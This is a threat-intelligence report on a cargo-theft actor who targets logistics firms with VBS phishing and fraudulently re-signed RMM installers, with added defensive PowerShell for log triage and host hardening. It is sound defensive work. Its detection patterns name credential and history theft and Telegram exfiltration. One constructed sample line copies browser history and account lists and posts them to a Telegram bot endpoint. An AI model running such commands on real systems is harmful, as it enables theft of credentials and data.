Full Report
Cargo-stealing hackers have a new trick up their sleeve: using a third-party code-signing service makes their remote management and monitoring software installers
Analysis Summary
# Threat Actor: Unnamed (Freight/Cargo Theft Actor)
## Attribution & Identity
* **Identification:** A "prolific" but currently unnamed threat actor, likely a small group of individuals.
* **Associations:** Linked to organized crime groups for the physical distribution and reselling of stolen goods.
* **Status:** Active; observed in campaigns from February 2024 through April 2026.
## Activity Summary
The actor specializes in compromising transportation and logistics firms to facilitate high-value cargo theft. A significant campaign began on February 27, 2026, with phishing emails carrying malicious Visual Basic Scripts (VBS). The actor follows a repeatable "post-compromise playbook": deploying several Remote Monitoring and Management (RMM) tools on each victim host, and re-signing the RMM installers through a third-party code-signing service so that they carry a valid Authenticode signature and pass signature-based security checks.
## Tactics, Techniques & Procedures
* **Phishing:** Delivery of malicious VBS attachments masquerading as "broker-carrier agreements."
* **Code Signing Evasion:** Use of a third-party service (`signer[.]bulbcentral[.]com`) to re-sign RMM installers with certificates that chain to a trusted CA and therefore validate, but that were obtained fraudulently. The practical consequence is that "is the signature valid?" is no longer a useful control on its own; the signer identity has to be checked against the vendor expected for that product.
* **Hands-on-Keyboard Activity:** Manual execution of scripts and commands rather than fully automated payloads.
* **Discovery/Enumeration:** Use of 13+ PowerShell scripts to extract browsing history, local accounts, and search for specific financial/logistics URLs.
* **Data Exfiltration:** Sending stolen data to attacker-controlled bots via Telegram.
* **Persistence & Redundancy:** Installation of multiple different RMM clients on a single host.
* **MITRE ATT&CK IDs:**
* **T1566.001:** Phishing: Spearphishing Attachment
* **T1218.011:** System Binary Proxy Execution: Msiexec
* **T1553.002:** Subvert Trust Controls: Code Signing
* **T1219:** Remote Access Software
* **T1059.001:** Command and Scripting Interpreter: PowerShell
* **T1102:** Web Service (Telegram bots as the attacker-controlled endpoint; the exfiltration itself maps more precisely to T1567, Exfiltration Over Web Service)
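The enumeration and exfiltration steps above leave a recognisable pattern in PowerShell script block logs (event 4104 in the Microsoft-Windows-PowerShell/Operational log, which requires script block logging to be enabled). The following is an added example, not code from the original report, showing one way to triage script block text for co-occurring indicators of that playbook: browser history file access, local account enumeration, logistics keyword searches and Telegram bot API calls. The indicator patterns, the alert threshold and the four sample script blocks are constructed for the example; the Telegram token and paths in them are invented.

```powershell
# Added example (not from the original report): triage PowerShell script-block
# text for the enumeration/exfiltration behaviours described in the TTP list.
# Input would normally be the ScriptBlockText field of event 4104; the samples
# below are constructed for this example and every token/path in them is invented.

# Indicator categories (regex, case-insensitive under PowerShell's -match).
# These are assumed patterns for illustration, not signatures from the report.
$Indicators = @{
    'browser_history'   = 'User Data\\Default|places\.sqlite|Login Data|\\History'
    'local_accounts'    = 'Get-LocalUser|net(1)?(\.exe)?\s+user|Win32_UserAccount'
    'telegram_exfil'    = 'api\.telegram\.org/bot|sendDocument|sendMessage'
    'logistics_targets' = 'loadboard|freight|carrier|broker|dispatch'
}

function Find-PlaybookIndicators {
    param(
        [Parameter(Mandatory)][string[]]$ScriptBlocks,
        # Number of distinct categories that must co-occur in one block before
        # it is flagged; a single category (e.g. Get-LocalUser alone) is routine.
        [int]$AlertThreshold = 2
    )
    foreach ($block in $ScriptBlocks) {
        $hits = foreach ($name in $Indicators.Keys) {
            if ($block -match $Indicators[$name]) { $name }
        }
        $preview = ($block -replace '\s+', ' ')
        [pscustomobject]@{
            Categories = @($hits | Sort-Object)
            Suspicious = (@($hits).Count -ge $AlertThreshold)
            Preview    = $preview.Substring(0, [Math]::Min(60, $preview.Length))
        }
    }
}

# Constructed samples: two benign admin blocks and two modelled on the playbook.
$Samples = @(
    'Get-Service | Where-Object Status -eq Running | Export-Csv C:\temp\svc.csv',
    'Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History" C:\Users\Public\h.db; Get-LocalUser | Out-File C:\Users\Public\u.txt',
    'Select-String -Path C:\Users\Public\h.db -Pattern "loadboard|carrier"; Invoke-RestMethod -Uri "https://api.telegram.org/bot000000:EXAMPLE/sendDocument" -Method Post -InFile C:\Users\Public\h.db',
    'Get-LocalUser | Format-Table Name, Enabled'
)

# Expected: samples 2 and 3 are flagged (two categories each); 1 and 4 are not.
Find-PlaybookIndicators -ScriptBlocks $Samples |
    Format-Table Suspicious, Categories, Preview -AutoSize
```

To run this against real data, replace `$Samples` with the `ScriptBlockText` values from `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}` on the host, or with the equivalent field in your SIEM. The threshold is deliberately set at two categories: local account enumeration on its own is everyday administration, but the same block also reading a browser history database or posting to a Telegram bot is the actor's playbook rather than an admin's.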
## Targeting
* **Sectors:** Transportation, Logistics, Freight Brokerage, and Fleet Services.
* **Geography:** Global (implied by the nature of international shipping and online reselling).
* **Victims:** Transport and logistics firms, specifically targeting carriers and brokers to intercept load bidding processes.
## Tools & Infrastructure
* **RMM Software:**
* ConnectWise ScreenConnect (multiple instances)
* SimpleHelp RMM
* Pulseway RMM
* **Malware/Scripts:** VBS downloaders, PowerShell enumeration/exfiltration scripts.
* **Infrastructure:**
* `amtechcomputers[.]net` (C2/Host for malicious MSI files)
* `signer[.]bulbcentral[.]com` (Third-party code-signing service)
* Telegram (Exfiltration channel)
## Implications
This actor represents a convergence of cybercrime and physical organized crime. By gaining access to logistics platforms, they can digitally "hijack" shipments by bidding on authentic loads and diverting them via fraudulent instructions. The use of a commercialized third-party code-signing service indicates a maturing ecosystem where specialized evasion tools are available to lower-tier actors to bypass endpoint protection.
## Mitigations
* **RMM Monitoring:** Implement application control (allowlisting) policies that block RMM tools (ScreenConnect, SimpleHelp, Pulseway, etc.) not explicitly approved by IT, and alert when more than one RMM agent is present on a single host, since the actor installs several for redundancy.
* **VBS/Script Blocking:** Disable or restrict the execution of Visual Basic Scripts and unsigned PowerShell scripts on end-user workstations.
* **Certificate Validation:** Monitor the Authenticode signer of RMM installers and other executables reaching endpoints. A signature that validates is not evidence of a legitimate vendor, because the re-signed installers in this campaign validate too; alert on installers signed by a subject other than the product's actual vendor, watch for newly issued or unfamiliar code-signing certificates, and block the `bulbcentral` signing infrastructure.
* **Industry-Specific Vigilance:** Conduct extra verification for broker-carrier agreements received via email, specifically looking for unexpected attachments.
* **EDR/Deception:** Deploy deception technology (honey-tokens/decoy AD environments) to catch hands-on-keyboard enumeration activities.
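The first three mitigations above can be checked on a Windows host with a few lines of PowerShell. The following is an added example, not code from the original report or from any of the RMM vendors, that inventories RMM agents present on the host against an approved list, audits the Authenticode signer of downloaded installers so that a valid signature from an unexpected signer is flagged rather than trusted, and disables Windows Script Host. The RMM name patterns, the approved display names, the placeholder signer subjects and the installer search paths are assumptions for illustration; replace the signer subjects with the `Subject` read from a known-good installer of each product you actually use.

```powershell
# Added example (not from the original report): host-side checks for the RMM,
# code-signing and VBS mitigations. Name patterns, approved lists and paths are
# assumptions for illustration.

# Product/service name patterns for the RMM tools named in the report.
$RmmPatterns = 'ScreenConnect|ConnectWise Control|SimpleHelp|Pulseway'

function Get-UnapprovedRmm {
    param([string[]]$ApprovedDisplayNames = @())   # e.g. 'Pulseway' if IT deploys it
    $services = Get-CimInstance Win32_Service |
        Where-Object { $_.DisplayName -match $RmmPatterns -or $_.PathName -match $RmmPatterns } |
        ForEach-Object { [pscustomobject]@{ Source = 'Service'; Name = $_.DisplayName; Detail = $_.PathName } }
    $uninstallKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
                     'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    $products = Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -match $RmmPatterns } |
        ForEach-Object { [pscustomobject]@{ Source = 'Installed'; Name = $_.DisplayName; Detail = $_.Publisher } }
    $found = @($services) + @($products)
    $unapproved = $found | Where-Object {
        $name = $_.Name
        -not ($ApprovedDisplayNames | Where-Object { $name -like "*$_*" })
    }
    # More than one RMM agent on a host is itself a signal: the report notes the
    # actor installs several for redundancy.
    [pscustomobject]@{
        RmmAgentsFound = $found.Count
        MultipleAgents = ($found.Count -gt 1)
        Unapproved     = @($unapproved)
    }
}

function Test-InstallerSigner {
    param(
        [Parameter(Mandatory)][string[]]$Path,
        # Placeholder subjects (assumed). Replace with the Subject of each
        # vendor's real certificate, read from a known-good installer.
        [string[]]$ApprovedSignerSubjects = @('CN=Vendor A Signing', 'CN=Vendor B Signing')
    )
    foreach ($file in (Get-ChildItem -Path $Path -File -ErrorAction SilentlyContinue)) {
        $sig = Get-AuthenticodeSignature -FilePath $file.FullName
        $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
        $issuer  = if ($sig.SignerCertificate) { $sig.SignerCertificate.Issuer }  else { '' }
        $knownSigner = $false
        foreach ($s in $ApprovedSignerSubjects) { if ($subject -like "$s*") { $knownSigner = $true } }
        [pscustomobject]@{
            File   = $file.Name
            Status = $sig.Status        # Valid, NotSigned, HashMismatch, NotTrusted, ...
            Signer = $subject
            Issuer = $issuer
            # Alert unless the signature is BOTH valid AND from the expected vendor.
            # A re-signed installer (the technique described above) is Valid but
            # carries a signer that is not the product's vendor.
            Alert  = -not ($sig.Status -eq 'Valid' -and $knownSigner)
        }
    }
}

function Disable-WindowsScriptHost {
    # Turns off wscript.exe/cscript.exe for all users, so .vbs/.js attachments
    # cannot run by double-click. Check for login scripts that rely on WSH first.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name Enabled -Value 0 -Type DWord
}

# Usage (run elevated):
Get-UnapprovedRmm -ApprovedDisplayNames @('Pulseway') | Format-List
Test-InstallerSigner -Path 'C:\Users\*\Downloads\*.exe', 'C:\Users\*\Downloads\*.msi' |
    Where-Object Alert | Format-Table File, Status, Signer, Issuer -AutoSize
Disable-WindowsScriptHost
```

The point of `Test-InstallerSigner` is the `Alert` column: it does not ask whether the signature is valid, it asks whether a valid signature comes from the signer you expect for that product. An installer that reports `Status = Valid` with an unfamiliar `Signer`, or with an `Issuer` you have never seen on that vendor's binaries, is exactly the artefact this campaign produces, and it should be treated as suspicious even though every signature-checking tool will report it as clean. Disabling Windows Script Host is a blunt control; where that is not acceptable, an AppLocker or WDAC script rule restricted to signed, IT-managed locations achieves the same goal for the phishing path described above.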